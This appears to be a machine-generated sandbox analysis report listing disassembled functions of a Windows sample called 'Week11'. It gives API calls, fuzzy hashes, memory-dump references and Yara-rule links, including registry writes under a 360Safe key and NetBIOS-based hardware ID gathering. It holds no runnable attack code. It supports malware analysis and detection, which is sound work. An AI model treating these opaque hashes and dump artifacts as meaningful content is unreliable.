                                • GetCurrentProcessId.KERNEL32(?,?), ref: 0044E10B
                                • _memset.LIBCMT ref: 0044E138
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000207), ref: 0044E14E
                                • PathAppendW.SHLWAPI(00000000,..\), ref: 0044E170
                                • PathAppendW.SHLWAPI(00000000,360conf.dll), ref: 0044E17A
                                • StrCmpIW.SHLWAPI(00000000), ref: 0044E184
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AppendModulePath$CurrentFileHandleNameProcess_memset
                                • String ID: ..\$360conf.dll
                                • API String ID: 1173251288-1134607443
                                • Opcode ID: 9d73298c1859ef131675fa24aeaa662315cf5a2b4b80396f5b0ec481edeecb8e
                                • Instruction ID: babd91c0767c677867bfdc00c07ace6a545936477273bb783c810e3d84ce7e00
                                • Opcode Fuzzy Hash: 9d73298c1859ef131675fa24aeaa662315cf5a2b4b80396f5b0ec481edeecb8e
                                • Instruction Fuzzy Hash: 0B110DB1A4031C5BE724AB65DC85BEF776CFB04310F0085BFB70592181DAB89989CB9D
                                Function 0049E6B2 Relevance: 15.2, APIs: 10, Instructions: 173COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: __fileno$__cftof__getbuf__wctomb_s_l
                                • String ID:
                                • API String ID: 1564009976-0
                                • Opcode ID: dc69dc7fbc931b89cc1007c0417ed9439a3306e2f5d96ff4636ab145922e6048
                                • Instruction ID: bc37aad22ed630eb5a172574e6de399923df5716b089e95bb7b7c62de78b7bca
                                • Opcode Fuzzy Hash: dc69dc7fbc931b89cc1007c0417ed9439a3306e2f5d96ff4636ab145922e6048
                                • Instruction Fuzzy Hash: B951D3325007059BCB20DF68D841AAE77E0AFE7328B24466FE4A587291D7BCE941CB5D
                                Function 0046C0D0 Relevance: 15.1, APIs: 10, Instructions: 98windowCOMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(?,00000005,?,?,00000000,?,?,?,?,1D1D1D8C,?,?), ref: 0046C0FB
                                • IsWindow.USER32(?), ref: 0046C11E
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046C12E
                                • IsWindow.USER32(?), ref: 0046C147
                                • TranslateMessage.USER32(?), ref: 0046C163
                                • DispatchMessageW.USER32(?), ref: 0046C16D
                                • IsWindow.USER32(?), ref: 0046C177
                                • IsWindow.USER32(?), ref: 0046C193
                                • PostMessageW.USER32(?,00000012,00000000,00000000), ref: 0046C1B1
                                • DestroyWindow.USER32(?,?,?,?,?,1D1D1D8C,?,?), ref: 0046C1C2
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Message$DestroyDispatchPostShowTranslate
                                • String ID:
                                • API String ID: 945159221-0
                                • Opcode ID: 57c7aeb8f609ca51b6251f38a7cdc336c925184a37725745ef94618587575966
                                • Instruction ID: 5349b1554b7d6b13fafc1c1eb26ce4a0e1003e0a771229fe3ca6c72b9234300f
                                • Opcode Fuzzy Hash: 57c7aeb8f609ca51b6251f38a7cdc336c925184a37725745ef94618587575966
                                • Instruction Fuzzy Hash: 443193756003059BDB20EBB4CD84FAB77A8BF49750F44465EE981A7286E738F801CF69
                                Function 004AA6C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004AA6E2
                                  • Part of subcall function 004A95F0: _memset.LIBCMT ref: 004A9625
                                  • Part of subcall function 004A95F0: _memset.LIBCMT ref: 004A96CB
                                  • Part of subcall function 004A95F0: _strncat.LIBCMT ref: 004A974F
                                • _memset.LIBCMT ref: 004AA769
                                • SHGetValueA.SHLWAPI ref: 004AA79A
                                • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 004AA809
                                • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 004AA838
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset$Value$_strncat
                                • String ID: Software\360Safe\Liveup$mid$mid_old
                                • API String ID: 2533611499-1528303271
                                • Opcode ID: 8f6c438cb50a4d85745fc3425b0a330f85dbf4cb33ab914b79417d4f446b5d7b
                                • Instruction ID: 758354d98a482564694d2a295953df0d72ca489cbe1f97f5f4e6267debf25624
                                • Opcode Fuzzy Hash: 8f6c438cb50a4d85745fc3425b0a330f85dbf4cb33ab914b79417d4f446b5d7b
                                • Instruction Fuzzy Hash: F34136315083459BE321DB208885FF777E9AFA6304F14091EE58987281E778951DC7AB
                                Function 004AA1A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004AA1C5
                                  • Part of subcall function 004A9440: GetProcAddress.KERNEL32(00000000,Netbios), ref: 004A9463
                                • _memset.LIBCMT ref: 004AA206
                                • _memset.LIBCMT ref: 004AA227
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset$AddressProc
                                • String ID: %02X%02X%02X%02X%02X%02X$* $2$3$7
                                • API String ID: 2047085092-1802369251
                                • Opcode ID: 2ae8f57defed816fcd0dbdf2e043d280dfe4faec22ec5c4774c4ddad453272f2
                                • Instruction ID: b5185da48c56e3bb05fd49e8d578d0ee374eb835078e2a388012ba28b7154dd0
                                • Opcode Fuzzy Hash: 2ae8f57defed816fcd0dbdf2e043d280dfe4faec22ec5c4774c4ddad453272f2
                                • Instruction Fuzzy Hash: FC41377150C3805FD321DB258C81BAB7BE86FEA304F4848AEF59947293D27C9619C76B
                                Function 004245A0 Relevance: 13.6, APIs: 9, Instructions: 134memorywindowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004245C6
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004245DD
                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 004245EB
                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042461D
                                • GdipSetPixelOffsetMode.GDIPLUS(00000000,00000002,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 00424645
                                • GdipSetSmoothingMode.GDIPLUS(?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 00424656
                                • GdipDrawImageRectI.GDIPLUS(?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000,?), ref: 004246BD
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000), ref: 004246D2
                                • GdipFree.GDIPLUS(?,00000000,?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A), ref: 004246D8
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Image$Mode$AllocBitmapCreateDeleteDrawFreeFromGraphicsHeightOffsetPixelRectScan0SmoothingWidth
                                • String ID:
                                • API String ID: 4157487250-0
                                • Opcode ID: e3cf0a69b922c1f095475634fdfa1c3cf12872b3884a6a262bca07d32cf31a50
                                • Instruction ID: 2d8f88f892067c8462d36ef45ad906f247f62c8cedfde0274191c8c77dfeeccb
                                • Opcode Fuzzy Hash: e3cf0a69b922c1f095475634fdfa1c3cf12872b3884a6a262bca07d32cf31a50
                                • Instruction Fuzzy Hash: CB41D671B00229AFDB20EFA9E8C196EB3F8EF85318B50456FF949D7300D638AD518B54
                                Function 00442730 Relevance: 13.6, APIs: 9, Instructions: 92memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 00442769
                                • SysFreeString.OLEAUT32(00000000), ref: 0044278B
                                • SysStringLen.OLEAUT32(?), ref: 0044279B
                                • SysStringLen.OLEAUT32(?), ref: 004427A5
                                • CoTaskMemAlloc.OLE32(00000002), ref: 004427AC
                                • SysFreeString.OLEAUT32(?), ref: 004427BF
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: String$AllocFree$Task
                                • String ID:
                                • API String ID: 1511711959-0
                                • Opcode ID: af17a773843fe2677d21ba650797fdc4f39f0b8e8a526ef2a21419ef42245db8
                                • Instruction ID: 49859850150a05cee1c5faa8b7596b5dd248a8acb7461314ecf7bfa1790a2522
                                • Opcode Fuzzy Hash: af17a773843fe2677d21ba650797fdc4f39f0b8e8a526ef2a21419ef42245db8
                                • Instruction Fuzzy Hash: D8214F7A2001086BEB00DF69DC84DAB7BACEFC8750B15852AFD08CB301D675E952CBB4
                                Function 0048236A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004822CA: GetParent.USER32(?), ref: 0048231E
                                  • Part of subcall function 004822CA: GetLastActivePopup.USER32(?), ref: 0048232F
                                  • Part of subcall function 004822CA: IsWindowEnabled.USER32(?), ref: 00482343
                                  • Part of subcall function 004822CA: EnableWindow.USER32(?,00000000), ref: 00482356
                                • EnableWindow.USER32(?,00000001), ref: 004823B7
                                • GetWindowThreadProcessId.USER32(?,?), ref: 004823CB
                                • GetCurrentProcessId.KERNEL32(?,?), ref: 004823D5
                                • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004823ED
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00482469
                                • EnableWindow.USER32(00000000,00000001), ref: 004824B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                • String ID: 0
                                • API String ID: 1877664794-4108050209
                                • Opcode ID: 3a17390735f5fddf6c080ee8498bc24afbfb48a6793156dff0f54a77fe800a1c
                                • Instruction ID: 8e585c70b680c40b4d562465b8605060ad5ecccd812445ed05c6be24a330da52
                                • Opcode Fuzzy Hash: 3a17390735f5fddf6c080ee8498bc24afbfb48a6793156dff0f54a77fe800a1c
                                • Instruction Fuzzy Hash: 13410671A00218ABCB21EF24DD85BDE77B8FF14710F10099AF815D6290D7B8CE81CBA8
                                Function 0047A530 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00475D38,00000000,00000000,00000CCC,00000040,?,?,?,00004000), ref: 0047A5A9
                                • __CxxThrowException@8.LIBCMT ref: 0047A5D9
                                • TlsSetValue.KERNEL32(?,00000000,?,00475D38,00000000,00000000,00000CCC,00000040,?,?,?,00004000), ref: 0047A5EE
                                • __CxxThrowException@8.LIBCMT ref: 0047A608
                                • ReleaseMutex.KERNEL32(?,00000004,004CD9E8), ref: 0047A63E
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8Throw$MutexObjectReleaseSingleValueWait
                                • String ID: (bN
                                • API String ID: 2684265641-263236600
                                • Opcode ID: 5f0e588e48c08ab02f6248e17f99f286595809f4d50f82fe2e037bd39970f039
                                • Instruction ID: 27f496866d8990fa095e078a65faca75cb8b74751a1e4995d36bfee892cf5d78
                                • Opcode Fuzzy Hash: 5f0e588e48c08ab02f6248e17f99f286595809f4d50f82fe2e037bd39970f039
                                • Instruction Fuzzy Hash: 3731FB71A002049BC710DFA8DC84AAEB7F8EB95774F244B6BE425E7390D73DD9018B99
                                Function 00484191 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 004841D1
                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004841FB
                                • GetSystemMetrics.USER32(00000000), ref: 00484212
                                • GetSystemMetrics.USER32(00000001), ref: 00484219
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 00484244
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                • String ID: B$DISPLAY
                                • API String ID: 381819527-3316187204
                                • Opcode ID: d9b9575dddac45fce8a95556427a8d05b54b373614e490c01c5873537addd045
                                • Instruction ID: 37ba2623ab80b836d71301728680889a1d878128fbe626e42cca22548f8401ec
                                • Opcode Fuzzy Hash: d9b9575dddac45fce8a95556427a8d05b54b373614e490c01c5873537addd045
                                • Instruction Fuzzy Hash: BC214CB1604322ABDF20AF10CC88B6F7B6CEF85761F104567FD159B185D678D840CBA8
                                Function 004246F0 Relevance: 12.2, APIs: 8, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                • GdipResetPath.GDIPLUS(?), ref: 0042471A
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424751
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 0042478D
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 004247CB
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424803
                                • GdipClosePathFigure.GDIPLUS(?,?,?,?), ref: 00424812
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: GdipPath$CloseFigureReset
                                • String ID:
                                • API String ID: 1165678104-0
                                • Opcode ID: 25ad8595897cfc011f22bd7f7509a9042fe7cdc94839624b9dd14a2432e1edd9
                                • Instruction ID: d8f18a0501c3a013d271e56735f09573a319e5fd5543ef274777617e319d1d18
                                • Opcode Fuzzy Hash: 25ad8595897cfc011f22bd7f7509a9042fe7cdc94839624b9dd14a2432e1edd9
                                • Instruction Fuzzy Hash: B651A274A00120EF8B14EF69E989D6B7FB9EFC5350B40C55AE858DB248D734EC50CBA9
                                Function 0045E070 Relevance: 12.1, APIs: 8, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0045E07D
                                • GetParent.USER32 ref: 0045E088
                                • GetWindowRect.USER32(00000000), ref: 0045E08F
                                  • Part of subcall function 0047F630: MonitorFromRect.USER32(?,00000002), ref: 0047F638
                                  • Part of subcall function 0047F630: GetMonitorInfoW.USER32 ref: 0047F67A
                                  • Part of subcall function 0047F630: MulDiv.KERNEL32(00000014,?,00000064), ref: 0047F697
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,?,00000000), ref: 0047F6BE
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,00000000,?), ref: 0047F6D3
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,?,00000000), ref: 0047F6E8
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,00000000,?), ref: 0047F6FD
                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?,?,?), ref: 0045E0FC
                                • ShowWindow.USER32(?,00000005,?,00000000,?,?,00000000,00000000,00000005,?,?,?,?), ref: 0045E105
                                • SetWindowPos.USER32(?,000000FF,?,?,00000000,00000000,00000001,?,?,?,?), ref: 0045E128
                                • ShowWindow.USER32(?,00000005,?,000000FF,?,?,00000000,00000000,00000001,?,?,?,?), ref: 0045E12D
                                • SetWindowPos.USER32(?,000000FE,?,?,00000000,00000000,00000001,?,00000005,?,000000FF,?,?,00000000,00000000,00000001), ref: 0045E144
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Rect$Window$Offset$MonitorShow$ClientFromInfoParent
                                • String ID:
                                • API String ID: 3049569217-0
                                • Opcode ID: 092bb2dce03e541efae5621312fcf8a15c56018c3c481612a977534922185c54
                                • Instruction ID: 546e9c3f4b5c4d5a21c1283eb3a080c89236ab16e2df80ef0f790bdbc6c9b076
                                • Opcode Fuzzy Hash: 092bb2dce03e541efae5621312fcf8a15c56018c3c481612a977534922185c54
                                • Instruction Fuzzy Hash: 44313EB5E00219ABDF14CFB8DD49FEEBBB9EB48311F144259F911B3280D674A900CB64
                                Function 004244D0 Relevance: 12.1, APIs: 8, Instructions: 91memorywindowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004244F5
                                • GdipGetImageWidth.GDIPLUS(?,?,?,?), ref: 0042450C
                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 0042451A
                                • GdipGetImagePixelFormat.GDIPLUS(?,?,00000010,?,?,?,?), ref: 0042452D
                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,?,00000000,?,?,?,00000010,?,?,?,?), ref: 00424554
                                • GdipGetImageGraphicsContext.GDIPLUS(?,?,?,?,00000000,?,00000000,?,?,?,00000010,?,?,?,?), ref: 00424573
                                • GdipDrawImageRectI.GDIPLUS(00000000,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0042458B
                                • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 00424591
                                Memory Dump Source
